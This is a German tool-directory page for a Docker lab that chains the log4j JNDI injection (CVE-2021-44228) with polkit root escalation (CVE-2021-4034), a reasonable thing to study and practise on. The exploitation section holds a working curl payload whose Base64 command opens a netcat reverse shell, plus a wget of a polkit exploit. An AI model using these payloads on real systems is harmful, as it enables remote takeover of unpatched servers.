Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
log4j-polkit-poc — Eine verwundbare Umgebung, die eine Angriffskette von log4j CVE-2021-44228 mit Privilegieneskalation zu Root mithilfe des polkit-Exploits CVE-2021-4034 demonstriert. | Kitploit
Tools/GitHubGitHub/0xalwayslucky/log4j-polkit-poc
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsLernen & BildungRed TeamingLabs & Praxis
GitHub0xalwayslucky/log4j-polkit-poc

log4j-polkit-poc

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Eine verwundbare Umgebung, die eine Angriffskette von log4j CVE-2021-44228 mit Privilegieneskalation zu Root mithilfe des polkit-Exploits CVE-2021-4034 demonstriert.

Repository anzeigen
12vor 4 JahrenNoch nicht geprüft

log4j CVE-2021-44228 + polkit CVE-2021-4034

Verwundbare Instanz für den log4j Apache-Exploit und Privilege Escalation mittels polkit

  • Die verwundbare spring-boot-application.jar wurde aus diesem Docker-Image extrahiert
  • Der bösartige JNDI-Server wurde von hier heruntergeladen und in diesem Artikel referenziert.

PoC-Video

PoC-Video

Erstellen der verwundbaren Instanzen

log4j-polkit-vuln

Die verwundbare Instanz wird nach Abschluss der folgenden Schritte ausgeführt und lauscht auf Verbindungen auf Port 80 (für die Host-Maschine freigegeben). Der verwundbare Teil für den log4j-Exploit ist der X-Api-Version-Header, der an den Server gesendet wird.

Docker: log4j-polkit-vulnerable-server

Schritte zum Abrufen und Ausführen des verwundbaren Docker-Images:

root@kitploit:~
docker pull 0xalwayslucky/log4j-polkit-vulnerable-server
docker run -p 80:8080 0xalwayslucky/log4j-polkit-vulnerable-server

Schritte zum manuellen Erstellen einer verwundbaren Instanz für log4j + polkit:

Hinweis: Die Dockerfiles erfordern bestimmte Versionen der verwundbaren Anwendungen, die in den Ubuntu-Repositories vorhanden sein müssen. Wenn diese zu einem beliebigen Zeitpunkt aktualisiert und/oder entfernt werden, schlägt der Build des Docker-Images fehl. Um dies zu lösen, wird ein Image auf dem Docker Hub hochgeladen und hier verlinkt.

root@kitploit:~
git clone https://github.com/0xalwayslucky/log4j-polkit-poc
cd log4j-polkit-poc/log4j-polkit-vuln
docker build -t log4j-polkit-vulnerable-server .
docker run -p 80:8080 --hostname victim log4j-polkit-vulnerable-server

attackserver

Dies simuliert die Maschine des Angreifers, in diesem Fall im selben Netzwerk vorhanden (aufgrund der einfachen Kommunikation zwischen Docker-Containern), aber der Exploit funktioniert unabhängig davon, wo sich dieser Angriffsserver befindet (einzige Bedingung ist, dass er vom Opfer erreichbar ist). Der bösartige JNDI-Server wird hier gehostet und erstellt eine bösartige Klasse, um beliebige Befehle auf der Maschine des Opfers auszuführen.

Schritte zum Erstellen einer simulierten Angreifer-Maschine:

root@kitploit:~
git clone https://github.com/0xalwayslucky/log4j-polkit-poc
cd log4j-polkit-poc/attackserver
docker build -t attackserver .
docker run -it --hostname attackserver attackserver /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i <ip> -p 8888 &  # im Docker-Container

Ausnutzung

Befehle aus dem PoC-Video

Hinweis: Die IP-Adresse des attackserver kann variieren

root@kitploit:~
# Log4j-Exploit
curl http://localhost -H 'X-Api-Version: ${jndi:ldap://172.17.0.3:1389/Basic/Command/Base64/bmMgMTcyLjE3LjAuMyA0NDQ0IC1lIC9iaW4vYmFzaA==}'

# Polkit-Exploit
wget https://raw.githubusercontent.com/afwu/CVE-2021-4035/main/cve-2021-4034-poc.c

Tool herunterladen